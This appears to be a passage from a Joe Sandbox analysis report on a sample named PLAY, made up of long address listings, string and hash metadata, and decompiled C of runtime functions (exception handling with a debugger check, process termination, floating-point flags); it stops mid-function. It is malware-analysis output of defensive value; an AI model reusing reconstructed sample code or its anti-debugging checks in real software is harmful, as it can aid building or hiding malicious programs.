          0x00ae78a0
          0x00ae78a6
          0x00ae78ac
          0x00ae7853
          0x00ae7861
          0x00ae7867
          0x00ae786d
          0x00ae7880
          0x00ae7886
          0x00ae788c
          0x00ae7892
          0x00ae7892
          0x00ae78b2
          0x00ae78b9
          0x00ae78bc
          0x00ae78c3
          0x00ae7906
          0x00ae7914
          0x00ae7914
          0x00ae7916
          0x00ae791c
          0x00ae7922
          0x00ae78c5
          0x00ae78c5
          0x00ae78cb
          0x00ae78d0
          0x00ae78d7
          0x00ae78dd
          0x00ae78e3
          0x00ae78ec
          0x00ae78ec
          0x00ae7933
          0x00ae7947
          0x00ae794d
          0x00ae7956
          0x00ae795d
          0x00ae7963
          0x00ae7969
          0x00ae796f
          0x00ae7978
          0x00ae797e
          0x00ae7980
          0x00ae798d
          0x00ae7996
          0x00ae7997
          0x00ae799d
          0x00ae79a3
          0x00ae79a9
          0x00ae79ac
          0x00ae79b0
          0x00ae79ba
          0x00ae79c0
          0x00ae79c2
          0x00ae79c4
          0x00ae79ca
          0x00ae79d2
          0x00ae79d7
          0x00ae79e0
          0x00ae79ea
          0x00ae79ed
          0x00ae79f9
          0x00ae7a02
          0x00ae7a05
          0x00ae7a0c
          0x00ae7a12
          0x00ae7a12
          0x00ae7a12
          0x00ae7a17
          0x00ae7a1d
          0x00ae7a23
          0x00ae7a29
          0x00ae7a29
          0x00ae7a2f
          0x00ae7a35
          0x00ae7a38
          0x00ae7a46
          0x00ae7a49
          0x00ae7a50
          0x00ae7a53
          0x00ae7a62
          0x00ae7a63
          0x00ae7a69
          0x00ae7a70
          0x00ae7a73
          0x00ae7a75
          0x00ae7a7b
          0x00ae7a7e
          0x00ae7a7e
          0x00ae7a7e
          0x00ae7a90
          0x00ae7a90
          0x00ae7a97
          0x00ae7a99
          0x00ae7a9f
          0x00ae7a9f
          0x00ae7a9f
          0x00ae7a90
          0x00ae7aa4
          0x00ae7aac
          0x00ae7aaf
          0x00ae7ab6
          0x00ae7abd
          0x00ae7ac3
          0x00ae7ac9
          0x00ae7ad4
          0x00ae7abf
          0x00ae7abf
          0x00ae7ac1
          0x00000000
          0x00000000
          0x00ae7ac1
          0x00ae7ae3
          0x00ae7ae8
          0x00ae7aee
          0x00ae7b01
          0x00ae7b0c
          0x00ae7b15
          0x00ae7b20
          0x00ae7b28
          0x00ae7b32
          0x00ae7b3c
          0x00ae7b41
          0x00ae7b48
          0x00ae7b4b
          0x00ae7b4d
          0x00ae7b50
          0x00ae7b7f
          0x00ae7b52
          0x00ae7b52
          0x00ae7b5d
          0x00ae7b64
          0x00ae7b6a
          0x00ae7b70
          0x00ae7b70
          0x00ae7b72
          0x00ae7b78
          0x00ae7b78
          0x00ae7b78
          0x00ae7b7d
          0x00ae7b85
          0x00ae7b8b
          0x00ae7b8d
          0x00ae7c58
          0x00ae7c5e
          0x00ae7c60
          0x00ae7c69
          0x00ae7c6f
          0x00ae7c6f
          0x00ae7c7b
          0x00ae7c81
          0x00ae7c8d
          0x00ae7c90
          0x00ae7c99
          0x00ae7c9f
          0x00ae7cae
          0x00ae7cb4
          0x00ae7cba
          0x00ae7cc0
          0x00ae7cc6
          0x00ae7cce
          0x00ae7cd4
          0x00ae7cd8
          0x00ae7cda
          0x00ae7cdb
          0x00ae7cdf
          0x00ae7ce5
          0x00ae7ceb
          0x00ae7cf0
          0x00ae7cf3
          0x00ae7cf5
          0x00ae7d49
          0x00ae7d55
          0x00ae7d6a
          0x00ae7d6e
          0x00ae7d74
          0x00ae7d7b
          0x00ae7d81
          0x00ae7d87
          0x00ae7d8d
          0x00ae7dd3
          0x00ae7d8f
          0x00ae7d91
          0x00ae7d95
          0x00ae7d9b
          0x00ae7da1
          0x00ae7db2
          0x00ae7dc5
          0x00ae7dc5
          0x00ae7df7
          0x00ae7df9
          0x00ae7dff
          0x00ae7e0c
          0x00ae7e19
          0x00ae7e1b
          0x00ae7e21
          0x00ae7e2a
          0x00ae7e2c
          0x00ae7e2d
          0x00ae7e2f
          0x00ae7e34
          0x00ae7e37
          0x00ae7e39
          0x00ae7e9f
          0x00ae7ea5
          0x00ae7eaa
          0x00ae7eac
          0x00ae7eb9
          0x00ae7ec6
          0x00ae7ec8
          0x00ae7ece
          0x00ae7eda
          0x00ae7eda
          0x00ae7edc
          0x00ae7ee8
          0x00ae7ee8
          0x00ae7ef3
          0x00ae7ef9
          0x00ae7efc
          0x00ae7f06
          0x00ae7f0c
          0x00ae7f12
          0x00ae7f18
          0x00ae7f2a
          0x00ae7f2c
          0x00ae7f2e
          0x00ae7f34
          0x00ae7f3a
          0x00ae7f3f
          0x00ae7f42
          0x00ae7f44
          0x00ae7f88
          0x00ae7f94
          0x00ae7f98
          0x00ae7f9b
          0x00ae7fa2
          0x00ae7fac
          0x00ae7fae
          0x00ae7faf
          0x00ae7fb4
          0x00ae7fb9
          0x00ae7fbc
          0x00ae7fc2
          0x00ae7fca
          0x00ae803a
          0x00ae803d
          0x00ae7fcc
          0x00ae7fe3
          0x00ae7fe4
          0x00ae7ff5
          0x00ae7ff7
          0x00ae800d
          0x00ae8013
          0x00ae8022
          0x00ae802c
          0x00ae8032
          0x00ae8032
          0x00ae8042
          0x00ae8044
          0x00ae8e9c
          0x00ae8e9c
          0x00000000
          0x00ae804a
          0x00ae804a
          0x00ae804d
          0x00ae8054
          0x00ae8063
          0x00ae806d
          0x00ae806f
          0x00ae8079
          0x00ae807f
          0x00ae8085
          0x00ae8087
          0x00ae80b3
          0x00ae80ba
          0x00ae80c2
          0x00ae80ca
          0x00ae80d5
          0x00ae80d7
          0x00ae80e0
          0x00ae80e3
          0x00ae80e9
          0x00ae80fc
          0x00ae80fc
          0x00ae8102
          0x00ae8089
          0x00ae8089
          0x00ae8090
          0x00000000
          0x00ae8092
          0x00ae8095
          0x00ae8096
          0x00ae80a2
          0x00ae80a5
          0x00ae80ab
          0x00ae80ab
          0x00ae8090
          0x00ae810d
          0x00ae810f
          0x00ae8114
          0x00ae811b
          0x00ae8121
          0x00ae812a
          0x00ae812d
          0x00ae8133
          0x00ae813c
          0x00ae8142
          0x00ae8148
          0x00ae8155
          0x00ae8161
          0x00ae8161
          0x00ae8163
          0x00ae8169
          0x00ae8169
          0x00ae816f
          0x00ae8176
          0x00ae81e0
          0x00ae81ec
          0x00ae81f9
          0x00ae8200
          0x00ae8207
          0x00ae820b
          0x00ae8211
          0x00ae8218
          0x00ae821e
          0x00ae8220
          0x00ae8231
          0x00ae8231
          0x00ae8233
          0x00ae8239
          0x00ae8240
          0x00ae8242
          0x00ae824a
          0x00ae8251
          0x00ae8254
          0x00ae8254
          0x00ae8254
          0x00ae8259
          0x00ae825f
          0x00ae825f
          0x00ae8265
          0x00ae8269
          0x00ae826c
          0x00ae8cd8
          0x00ae8cdf
          0x00ae8ce4
          0x00ae8ea6
          0x00ae8ea6
          0x00000000
          0x00ae8cea
          0x00ae8cea
          0x00ae8cf9
          0x00ae8d07
          0x00ae8d16
          0x00ae8d1b
          0x00ae8d27
          0x00ae8d27
          0x00ae8d2d
          0x00ae8d3a
          0x00ae8d44
          0x00ae8d4e
          0x00ae8d54
          0x00ae8d64
          0x00ae8d65
          0x00ae8d73
          0x00ae8d82
          0x00ae8d87
          0x00ae8d8d
          0x00ae8d9a
          0x00ae8d9c
          0x00ae8da3
          0x00ae8daf
          0x00ae8db6
          0x00ae8dc7
          0x00ae8de2
          0x00ae8de7
          0x00ae8dea
          0x00ae8dec
          0x00000000
          0x00000000
          0x00ae8dfa
          0x00ae8e07
          0x00ae8e17
          0x00ae8e1b
          0x00ae8e1f
          0x00ae8e21
          0x00ae8e24
          0x00ae8e2a
          0x00ae8e37
          0x00ae8e3e
          0x00ae8e44
          0x00ae8e47
          0x00ae8e4d
          0x00ae8e53
          0x00000000
          0x00ae8e59
          0x00ae8e59
          0x00ae8eac
          0x00ae8ece
          0x00ae8ee4
          0x00ae8eeb
          0x00ae8eee
          0x00ae8ef0
          0x00ae8f07
          0x00ae8f12
          0x00ae8f1a
          0x00ae8f24
          0x00ae8f24
          0x00ae8f24
          0x00ae8f2b
          0x00ae8f31
          0x00ae8f37
          0x00ae8f3d
          0x00ae8f3f
          0x00ae8f44
          0x00ae8f46
          0x00ae8f49
          0x00ae8f4f
          0x00ae8f55
          0x00ae8f5b
          0x00ae8f62
          0x00ae8f62
          0x00ae8f62
          0x00ae8f67
          0x00ae8f67
          0x00ae8f80
          0x00ae8f91
          0x00ae8f98
          0x00ae8fa0
          0x00ae8fa8
          0x00ae8fab
          0x00ae8fb1
          0x00ae9060
          0x00ae9074
          0x00ae9080
          0x00ae908d
          0x00ae908d
          0x00ae908f
          0x00ae9095
          0x00000000
          0x00ae8fb7
          0x00ae8fc8
          0x00ae8fd2
          0x00ae8fd5
          0x00ae8ff0
          0x00ae8ff8
          0x00ae8ffa
          0x00ae9052
          0x00ae9052
          0x00ae9054
          0x00ae9057
          0x00000000
          0x00ae8ffc
          0x00ae9012
          0x00ae9029
          0x00ae9030
          0x00ae9030
          0x00ae8ffa
          0x00000000
          0x00ae8e5b
          0x00ae8e5b
          0x00ae8e61
          0x00000000
          0x00ae8e67
          0x00000000
          0x00ae8e67
          0x00ae8e61
          0x00ae8e59
          0x00000000
          0x00ae8e53
          0x00ae8e7e
          0x00ae8e90
          0x00ae8e90
          0x00ae8e96
          0x00000000
          0x00ae8cec
          0x00ae8cec
          0x00ae8cf3
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00ae8cf3
          0x00ae8cea
          0x00000000
          0x00ae8272
          0x00ae8286
          0x00ae828c
          0x00ae8292
          0x00ae82a7
          0x00ae82ad
          0x00ae82b5
          0x00ae82b8
          0x00ae82c0
          0x00ae82c8
          0x00ae82d0
          0x00ae82d3
          0x00ae82db
          0x00ae82e1
          0x00ae82ec
          0x00ae82f2
          0x00ae82f8
          0x00ae8303
          0x00ae830b
          0x00ae8311
          0x00ae831d
          0x00ae831f
          0x00ae8327
          0x00ae832d
          0x00ae833b
          0x00ae8345
          0x00ae834f
          0x00ae8355
          0x00ae835b
          0x00ae8365
          0x00ae836b
          0x00ae8372
          0x00ae8375
          0x00ae8377
          0x00ae837d
          0x00ae8380
          0x00ae8380
          0x00ae838a
          0x00ae838e
          0x00ae8391
          0x00ae8394
          0x00ae839a
          0x00ae839f
          0x00ae83a1
          0x00ae83a7
          0x00ae83ac
          0x00ae83b9
          0x00ae83b9
          0x00ae83bb
          0x00ae83c0
          0x00ae83c7
          0x00ae83ce
          0x00ae83d1
          0x00ae83d1
          0x00ae83d4
          0x00ae83d7
          0x00ae83d7
          0x00ae83d7
          0x00ae83e8
          0x00ae83f1
          0x00ae83fa
          0x00ae8407
          0x00ae840a
          0x00ae844c
          0x00ae840c
          0x00ae8414
          0x00ae8416
          0x00ae8418
          0x00ae841e
          0x00ae842b
          0x00ae8431
          0x00ae8437
          0x00ae843d
          0x00ae843d
          0x00ae8452
          0x00ae8462
          0x00ae8469
          0x00ae846f
          0x00ae847e
          0x00ae8487
          0x00ae8495
          0x00ae849f
          0x00ae84a1
          0x00ae84ac
          0x00ae84b2
          0x00ae84bf
          0x00ae84c9
          0x00ae84d0
          0x00ae84da
          0x00ae84e0
          0x00ae84e7
          0x00ae84f0
          0x00ae84f9
          0x00ae84ff
          0x00ae8501
          0x00ae8515
          0x00ae851b
          0x00ae851e
          0x00ae8520
          0x00ae8526
          0x00ae852c
          0x00ae853b
          0x00ae853b
          0x00ae853b
          0x00ae8542
          0x00ae8503
          0x00ae8503
          0x00ae850b
          0x00000000
          0x00ae850d
          0x00ae850d
          0x00ae850d
          0x00ae850b
          0x00ae8555
          0x00ae8558
          0x00ae855e
          0x00ae8565
          0x00ae8568
          0x00ae8572
          0x00ae8579
          0x00ae8580
          0x00ae8588
          0x00ae885b
          0x00ae885b
          0x00000000
          0x00ae858e
          0x00ae858e
          0x00ae859d
          0x00ae859d
          0x00ae85a3
          0x00ae85a9
          0x00ae85a9
          0x00ae85ab
          0x00ae85b7
          0x00ae85c3
          0x00ae85d0
          0x00ae85e0
          0x00ae85e1
          0x00ae85ef
          0x00ae85f6
          0x00ae8601
          0x00ae8608
          0x00ae860f
          0x00ae8615
          0x00ae8622
          0x00ae8624
          0x00ae862a
          0x00ae8630
          0x00ae863c
          0x00ae8640
          0x00ae8646
          0x00ae8654
          0x00ae865a
          0x00ae8663
          0x00ae8670
          0x00ae8683
          0x00ae869e
          0x00ae86a3
          0x00ae86a6
          0x00ae86a8
          0x00000000
          0x00000000
          0x00ae86cd
          0x00ae86d8
          0x00ae86dc
          0x00ae86de
          0x00ae86e4
          0x00ae86fb
          0x00ae8701
          0x00ae870d
          0x00ae8714
          0x00ae871b
          0x00ae871e
          0x00ae8724
          0x00ae872a
          0x00ae8731
          0x00ae8737
          0x00ae873d
          0x00ae8743
          0x00000000
          0x00ae8749
          0x00ae8749
          0x00ae8861
          0x00ae8869
          0x00ae8870
          0x00ae887d
          0x00ae8880
          0x00ae8886
          0x00ae888c
          0x00ae888e
          0x00ae8890
          0x00ae8898
          0x00ae88a0
          0x00ae88a6
          0x00ae88ad
          0x00ae88b5
          0x00ae88b5
          0x00ae88b7
          0x00ae88c0
          0x00ae88c6
          0x00ae88c8
          0x00ae88cd
          0x00ae88d0
          0x00ae88d6
          0x00ae88d6
          0x00ae88d6
          0x00ae88db
          0x00ae88e1
          0x00ae88e1
          0x00ae88f5
          0x00ae88fd
          0x00ae88fe
          0x00ae8904
          0x00ae8907
          0x00ae8914
          0x00ae8917
          0x00ae891d
          0x00ae8b45
          0x00000000
          0x00ae8923
          0x00ae8923
          0x00ae8930
          0x00ae894d
          0x00ae8970
          0x00ae898c
          0x00ae899f
          0x00ae89a5
          0x00ae89ac
          0x00ae89b8
          0x00ae89bb
          0x00ae89c1
          0x00ae89c7
          0x00ae89c9
          0x00ae8b1f
          0x00ae8b27
          0x00ae8b34
          0x00ae8b3d
          0x00ae8b4c
          0x00ae8b68
          0x00ae8b70
          0x00ae8b7c
          0x00ae8b7e
          0x00ae8b84
          0x00ae8b8a
          0x00ae8b90
          0x00ae8ba3
          0x00ae8ba3
          0x00ae8ba5
          0x00ae8bac
          0x00ae8bb2
          0x00ae8bb7
          0x00ae8bbe
          0x00ae8bc1
          0x00ae8bc8
          0x00ae8bcf
          0x00ae8bd5
          0x00ae8bd5
          0x00ae8bd8
          0x00ae8bdb
          0x00ae8bdb
          0x00ae8bdb
          0x00ae8bf0
          0x00ae8bf5
          0x00ae8bf5
          0x00ae8bf7
          0x00ae8bfa
          0x00ae8c00
          0x00ae8c00
          0x00ae8c03
          0x00ae8c06
          0x00ae8c06
          0x00ae8c06
          0x00ae8c11
          0x00ae8c16
          0x00ae8c16
          0x00ae8c18
          0x00ae8c1e
          0x00ae8c21
          0x00ae8c21
          0x00ae8c24
          0x00ae8c27
          0x00ae8c27
          0x00ae8c27
          0x00ae8c32
          0x00ae8c3e
          0x00ae8c4c
          0x00ae8c54
          0x00ae8c66
          0x00ae8c7a
          0x00ae8c8a
          0x00ae8c92
          0x00ae8c9a
          0x00ae8ca2
          0x00ae8caa
          0x00ae8cb2
          0x00ae8cbc
          0x00ae8cc6
          0x00ae8ccd
          0x00ae909b
          0x00ae90a1
          0x00ae90a4
          0x00ae90a6
          0x00ae90a8
          0x00ae90ae
          0x00ae90b4
          0x00ae90ba
          0x00ae90ca
          0x00ae90cc
          0x00ae90cf
          0x00ae90d5
          0x00ae90db
          0x00ae90e1
          0x00ae90e1
          0x00ae90e1
          0x00ae90e6
          0x00ae90e6
          0x00000000
          0x00ae89cf
          0x00ae89cf
          0x00ae89d4
          0x00ae89d7
          0x00ae89d7
          0x00ae89da
          0x00ae89dd
          0x00ae89dd
          0x00ae89dd
          0x00ae89e9
          0x00ae89ff
          0x00ae8a05
          0x00ae8a10
          0x00ae8a1d
          0x00ae8a25
          0x00ae8a27
          0x00ae8a3b
          0x00ae8a51
          0x00ae8a62
          0x00ae8a69
          0x00ae8a6f
          0x00ae8a77
          0x00ae8a7f
          0x00ae8a87
          0x00ae8a91
          0x00ae8a9b
          0x00ae8aa2
          0x00ae8aaa
          0x00ae8ab3
          0x00ae8ab6
          0x00ae8ac8
          0x00ae8acb
          0x00ae8acd
          0x00ae8ad3
          0x00ae8ae4
          0x00ae8ae4
          0x00ae8ae5
          0x00ae8ae5
          0x00ae8af8
          0x00ae8b04
          0x00ae8b0c
          0x00ae8b0c
          0x00ae89c9
          0x00ae874f
          0x00ae874f
          0x00ae8755
          0x00000000
          0x00ae875b
          0x00000000
          0x00ae875b
          0x00ae8755
          0x00ae8749
          0x00000000
          0x00ae8743
          0x00ae8760
          0x00ae8765
          0x00ae8770
          0x00ae8770
          0x00ae8773
          0x00ae8776
          0x00ae8776
          0x00ae8776
          0x00ae8781
          0x00ae878c
          0x00ae8792
          0x00ae879e
          0x00ae87a3
          0x00ae87aa
          0x00ae87b0
          0x00ae87bd
          0x00ae87c7
          0x00ae87d5
          0x00ae87dd
          0x00ae87ec
          0x00ae87f6
          0x00ae87fe
          0x00ae880f
          0x00ae8817
          0x00ae881f
          0x00ae8827
          0x00ae882f
          0x00ae8839
          0x00ae8843
          0x00ae884a
          0x00ae8850
          0x00ae8590
          0x00ae8590
          0x00ae8597
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00ae8597
          0x00ae858e
          0x00ae8588
          0x00ae8178
          0x00ae8184
          0x00ae8186
          0x00ae8194
          0x00ae81a5
          0x00ae81b5
          0x00ae81ce
          0x00000000
          0x00ae81ce
          0x00ae8176
          0x00ae7f46
          0x00ae7f51
          0x00ae7f60
          0x00ae7f65
          0x00ae7f6c
          0x00ae7f6d
          0x00ae7f6d
          0x00ae7e3b
          0x00ae7e4f
          0x00ae7e56
          0x00ae7e62
          0x00ae7e6e
          0x00ae7e85
          0x00ae7e94
          0x00ae7e94
          0x00ae7cf7
          0x00ae7cfe
          0x00ae7d0a
          0x00ae7d0f
          0x00ae7d19
          0x00ae7d20
          0x00ae7d27
          0x00ae7d2e
          0x00000000
          0x00ae7d2e
          0x00ae7b93
          0x00ae7b98
          0x00ae7b9f
          0x00ae7baa
          0x00ae7bb8
          0x00ae7bb8
          0x00ae7bbb
          0x00ae7bc5
          0x00ae7bcf
          0x00ae7bd9
          0x00ae7be3
          0x00ae7bed
          0x00ae7bf7
          0x00ae7c04
          0x00ae7c0a
          0x00ae7c0a
          0x00ae7c19
          0x00ae7c2e
          0x00ae7c46
          0x00ae90ec
          0x00ae90ec
          0x00ae90f2
          0x00ae90f2
          0x00ae90f7
          0x00ae90f7
          0x00ae90f7
          0x00ae90fd
          0x00ae90fd
          0x00ae9104
          0x00ae9109
          0x00ae910f
          0x00ae9113
          0x00ae9113
          0x00ae9115
          0x00ae9125
          0x00ae9139
          0x00ae9139
          0x00ae913c
          0x00ae913c
          0x00ae9143
          0x00ae9143
          0x00ae9143
          0x00ae9148
          0x00ae914e
          0x00ae915e
          0x00ae9177
          0x00ae9186
          0x00ae9193
          0x00ae91a0
          0x00ae91a0
          0x00ae91a6
          0x00ae91a6
          0x00ae91ad
          0x00ae91b2
          0x00ae91b5
          0x00ae91b5
          0x00ae91b8
          0x00ae91bb
          0x00ae91bb
          0x00ae91bb
          0x00ae91c3
          0x00ae91d2
          0x00ae91dd
          0x00ae749b
          0x00ae74ae
          0x00ae74ae

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: Fz$O6sop$dpb7$luvdi5J$r{F$tlN4w$pyO
          • API String ID: 0-1846385646
          • Opcode ID: 198b56c1cf6c7b6175593c923a8855f288e28993c9349c4b507d434183869553
          • Instruction ID: f2e1b1c9467193beeb6a8f0e6ac3a6461232fad2962e085e7a68e86210c8970a
          • Opcode Fuzzy Hash: 198b56c1cf6c7b6175593c923a8855f288e28993c9349c4b507d434183869553
          • Instruction Fuzzy Hash: 36131575D092A98ADB21CB69CC547EDBBB0AF6A300F0442DAD48CB7282D6744FC5CF65
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFA283 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 76%
          			E00AFA283(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0xb0b004; // 0x700d25f7
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00AF843E(_t41);
					_pop(_t62);
				}
				E00AF8BB0(_t67,  &_v804, 0, 0x50);
				E00AF8BB0(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00AF843E(_t57);
				}
				return E00AF7B30(_v8 ^ _t70);
			}




































          0x00afa283
          0x00afa283
          0x00afa283
          0x00afa283
          0x00afa28e
          0x00afa293
          0x00afa295
          0x00afa29d
          0x00afa29f
          0x00afa2a2
          0x00afa2a7
          0x00afa2a7
          0x00afa2b3
          0x00afa2c6
          0x00afa2d4
          0x00afa2da
          0x00afa2e0
          0x00afa2e6
          0x00afa2ec
          0x00afa2f2
          0x00afa2f8
          0x00afa2fe
          0x00afa304
          0x00afa30a
          0x00afa311
          0x00afa318
          0x00afa31f
          0x00afa326
          0x00afa32d
          0x00afa334
          0x00afa335
          0x00afa33e
          0x00afa344
          0x00afa347
          0x00afa34d
          0x00afa35a
          0x00afa363
          0x00afa36c
          0x00afa375
          0x00afa383
          0x00afa385
          0x00afa39a
          0x00afa3a6
          0x00afa3a9
          0x00afa3ae
          0x00afa3bb

          APIs
          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AFA37B
          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AFA385
          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AFA392
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ExceptionFilterUnhandled$DebuggerPresent
          • String ID:
          • API String ID: 3906539128-0
          • Opcode ID: 074d8bafdfa8a14d7af9054354439ee4bd11b29e265a5306a186f473b400b7d3
          • Instruction ID: c1d6da197edd015e40de4ae51e40e6523c0c795b27c4a2d725435a613c5d37e1
          • Opcode Fuzzy Hash: 074d8bafdfa8a14d7af9054354439ee4bd11b29e265a5306a186f473b400b7d3
          • Instruction Fuzzy Hash: CC31D4B491122C9BCB21DF64D989BDCBBB8BF18310F5041DAF51CA7260EB349B818F55
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFB0AC Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFB0AC(int _a4) {
				void* _t14;

				if(E00AFD3FB(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00AFB0EE(_t14, _a4);
				ExitProcess(_a4);
			}




          0x00afb0b9
          0x00afb0d5
          0x00afb0d5
          0x00afb0de
          0x00afb0e7

          APIs
          • GetCurrentProcess.KERNEL32(00AFBFEF,?,00AFB0AB,00AFA504,00000087,00AFBFEF,00AFA504,00AFBFEF), ref: 00AFB0CE
          • TerminateProcess.KERNEL32(00000000,?,00AFB0AB,00AFA504,00000087,00AFBFEF,00AFA504,00AFBFEF), ref: 00AFB0D5
          • ExitProcess.KERNEL32 ref: 00AFB0E7
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: Process$CurrentExitTerminate
          • String ID:
          • API String ID: 1703294689-0
          • Opcode ID: f1f2afcd66a8074ca37716d779c983c2f9b6dda345750d0065fb369f371cefd4
          • Instruction ID: 598ebbaf540f22de6f7b8bc0ff6f8fade6f54e8211208a3152925aa2bbbb8e88
          • Opcode Fuzzy Hash: f1f2afcd66a8074ca37716d779c983c2f9b6dda345750d0065fb369f371cefd4
          • Instruction Fuzzy Hash: 93E0BD7201050CABCB226BA4DE49A6A7B79EB55341B008414FB199B131EF76ED82DAA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00B0223D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODECrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E00B0223D(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
